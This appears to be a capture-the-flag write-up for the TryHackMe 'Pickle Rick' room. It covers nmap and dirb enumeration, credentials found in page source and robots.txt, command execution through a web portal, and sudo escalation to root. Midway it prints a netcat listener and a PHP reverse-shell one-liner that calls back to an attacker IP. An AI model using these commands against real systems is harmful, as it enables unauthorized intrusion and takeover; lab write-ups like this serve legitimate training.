URL: https://tryhackme.com/room/picklerick
If you’re going to be doing a lot of CTF challenges then it might be worth adding the following function to your .zshrc or .bashrc using:
So the first command is putting the function into your .zshrc file but can also be done with .bashrc.
Then the second command is updating the variables defined in your .zshrc file.
The third command is just to make sure that the function is there for sanity.
Now to create a thm directory with the challenge name and cd into it just run:
$ mkcd thm/picklerick
If you prefer to not mess with bash or zsh then create a directory to put all of the notes in like:
$ mkdir -p thm/picklerick/;cd thm/picklerick
Now start the machine in THM so it provides the IP and I then set this in the terminal so you don’t have to keep remembering it when running commands against it like:
$ export IP=<the_ip_thm_assigns_the_machine>
Lets start a scan to see what we get with nmap:
$ sudo nmap -sC -sV -oN scan $IP
The scan shows the above^
We can see port 80 is open running Apache so I thought I would see if there are any headers that may help:
Lets have a gander with dirbuster looking for the following extensions php,sh.txt,cgi,html,js,css,py using:
$ dirb http://$IP -X .php,.sh,.txt,.cgi,.html,.js,.css,.py
I can see straight away that there is a index.html so lets have a look:
$ wget -qO- http://$IP/index.html
I have found something interesting:
So I take a note of the username and look to see what robots.txt shows me using:
$ wget -qO- http://$IP/robots.txt
Interesting so that string goes into my creds.txt file as well.
$ sudo -u kali firefox http://$IP/login.php
So now I will try and log in with the details I have found:
Ok so those details worked and we have a page that shows the following, but clicking tabs you cannot do much:
Lets try a command and see what happens. So I thought the list command would show something:
Now we have a list of files to try and look at, but there is one that looks like it could be a flag:
Looks like I have the first flag so lets stick that into the creds.txt file as well:
Lets see what happens if we try php or python commands in the portal:
Ok so they seem to work which means we can try a reverse shell, but we first need to get our local IP to be able to use netcat:
Now I will run netcat with the port of my choosing 6666:
$ nc -lvnp 6666
Then because we know PHP works lets try a reverse shell with the following command into the portal box and press execute:
php -r “\$sock=fsockopen(‘10.9.156.86’,6666);\$proc=proc_open(‘/bin/sh -i’,array(0=>\$sock, 1=>\$sock, 2=>\$sock,),\$pipes);”
Now we have a reverse shell we can start looking around to try and find other flags. But we seem to have an error about tty.
You can use the following next:
/usr/bin/script -qc /bin/bash /dev/null
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
It allowed me to switch users from www-data to root and then look at files and there appears to be some interesting names.
We can see that there is a home directory for rick so let’s take a look in there.
Looks like we have all of the flags that are left now.
Looking back on this at the end I realise the reverse shell wasn’t even needed. I could have executed $ sudo -i or $ sudo bash in the portal to escalate privileges.
EDIT: Trying to get the second flag now gives you this page 🙂
wheresmyshiftkey 